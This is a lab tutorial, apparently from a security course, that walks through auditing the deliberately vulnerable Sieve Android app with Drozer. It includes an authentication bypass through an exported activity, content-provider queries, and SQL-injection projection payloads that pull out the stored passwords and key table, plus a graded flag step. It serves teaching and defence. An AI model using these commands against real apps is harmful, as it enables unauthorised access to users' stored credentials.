Drozer allows you to audit IPC endpoints.
sudo apt update
sudo apt install curl -y
wget https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
curl https://raw.githubusercontent.com/pypa/get-pip/3843bff3a0a61da5b63ea0b7d34794c5c51a2f11/2.7/get-pip.py -o get-pip.py
python get-pip.py
python -m pip install drozer-2.4.4-py2-none-any.whl
pip install twisted
Drozer is "successfully installed",
as shown below.
On Debian, in a Terminal, execute these commands:
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
The file downloads,
as shown below.
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the
"List of devices attached",
as shown below.
adb install drozer-agent-2.3.4.apk
You see a "Success" message,
as shown below.
On Debian, in a Terminal, execute this command:
adb forward tcp:31415 tcp:31415
The command completes without errors,
as shown below.
Launch drozer, as shown below.
In the "drozer" screen, at the lower right, click OFF. Now the "Embedded Server" is "ON", as shown below.
drozer console connect
help
Drozer starts,
as shown below.
On Debian, at the
dz>
prompt, execute
these commands:
help shell
! whoami
As you can see, Drozer allows you to
run shellcode on your device, with
the permissions of the Drozer agent,
which is not root, but a
numbered user account. On my device,
the account was u0_s102,
as shown below.
On Debian, at the
dz>
prompt, execute
this command:
list
A long list of drozer modules appears,
as shown below. Drozer is a huge
pentesting framework, like Metasploit.
As you can see, Drozer allows you to
run shellcode on your device, with
the permissions of the Drozer agent,
which is not root, but a
numbered user account. On my device,
the account was u0_s102,
as shown below.
On Debian, at the
dz>
prompt, execute
this command:
exit
On Debian, in the Terminal, execute these commands.
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk
adb install sieve.apk
The install fails, saying "NO_MATCHING_ABIS,
as shown below.
The problem is that Sieve is an ARM app, but Genymotion is an x86 emulator.
Troubleshooting
If that download link fails, use this alternate command:
wget https://samsclass.info/128/proj/sieve.apk
https://github.com/m9rco/Genymotion_ARM_Translation
You can download the ZIP file from that page and unzip it, or use "git", as shown below.
On a Mac, execute these commands:
brew install git
git clone https://github.com/m9rco/Genymotion_ARM_Translation.git
Open the "Genymotion_ARM_Translation/package" folder,
as shown below.
Drag the appropriate library file onto your Android device and drop it there.
A warning message pops up, as shown below. Click OK.
A message says the file was flashed successfully, as shown below. Click OK.
Turn off your Android device and restart it.
On Debian, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the
"List of devices attached",
as shown below.
adb install sieve.apk
You see a "Success" message,
as shown below.
Launch Sieve, as shown below.
A "Welcome!" screen appears, as shown below.
Enter a password of Password12345678 in both fields and click Submit.
On the "Enter PIN" page, enter a PIN of 4567 in both fields and click Submit, as shown below.
In the next page, enter a password of Password12345678 fields and click "Sign in", as shown below.
In the "Your Passwords" page, at the top right, click the + icon.
Enter some test data, as shown below, and click Save.
Don't put any real passwords into this app, of course, because they will be revealed later in the project.
Launch drozer, as shown below.
The "Embedded Server" should be "ON", as shown below.
dz>
prompt, execute
these commands:
adb forward tcp:31415 tcp:31415
drozer console connect
run app.package.list -f sieve
Drozer finds the path to the
sieve app, which is
com.mwr.example.sieve
as shown below.
To see basic package information,
on Debian, at the
dz>
prompt, execute
this command:
run app.package.info -a com.mwr.example.sieve
This shows where the app stores
data, what permissions it has, and more
information,
as shown below.
dz>
prompt, execute
this command:
run app.package.attacksurface com.mwr.example.sieve
Drozer finds several items "exported"
as shown below. These items accept
input from other apps, and are possible
avenues of exploitation.
dz>
prompt, execute
this command:
run app.activity.info -a com.mwr.example.sieve
Drozer finds several items "exported"
as shown below. These items accept
input from other apps, and are possible
avenues of exploitation.
The "MainLoginActivity" makes sense--the app needs to take input from the keyboard for that.
But what are "FileSelectActivity" and "PWList"? They are both exported, and can be run without any permissions, as indicated by the "Permission: null" message.
Position the Android device so that it remains visible while you execute the Dozer command below.
dz>
prompt, execute
this command:
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
The command runs without errors,
as shown below.
On your Android device, the "Your Passwords" page opens, as shown below.
This is an authentication bypass exploit--the Drozer agent did not need your password or PIN to open this screen.
But at this point, we only see usernames, not passwords.
dz>
prompt, execute
this command:
run app.provider.info -a com.mwr.example.sieve
Drozer finds two exported content
providers: DBContentProvider
and FileBackupProvider,
as shown below. They don't require
any permissions to interact with them,
except for the /Keys
path in the DBContentProvider.
On Debian, at the
dz>
prompt, execute
this command:
run scanner.provider.finduris -a com.mwr.example.sieve
Drozer tries several guesses, and finds
three "Accessible content URIs",
highlighted in the image below.
We know the /Keys provider requires
permissions, but evidently not
/Passwords. To run the
/Passwords provider,
on Debian, at the
dz>
prompt, execute
this command:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
You see your username and encoded password,
highlighted in the image below.
The password was unprintable binary data, so Drozer encoded it with Base64. We don't have the plaintext password yet.
On Debian, at the
dz>
prompt, execute
these commands:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
The reply shows"SQLITE_ERROR" messages,
including the source code for the query,
highlighted in the image below.
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
The reply reveals three table names,
including Key,
highlighted in the image below.
M 501: Recording Your Success (20 pts)
Find the text covered by a green box in the image above. That's the flag.
Execute this command:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
The reply reveals
your plaintext password,
as shown below.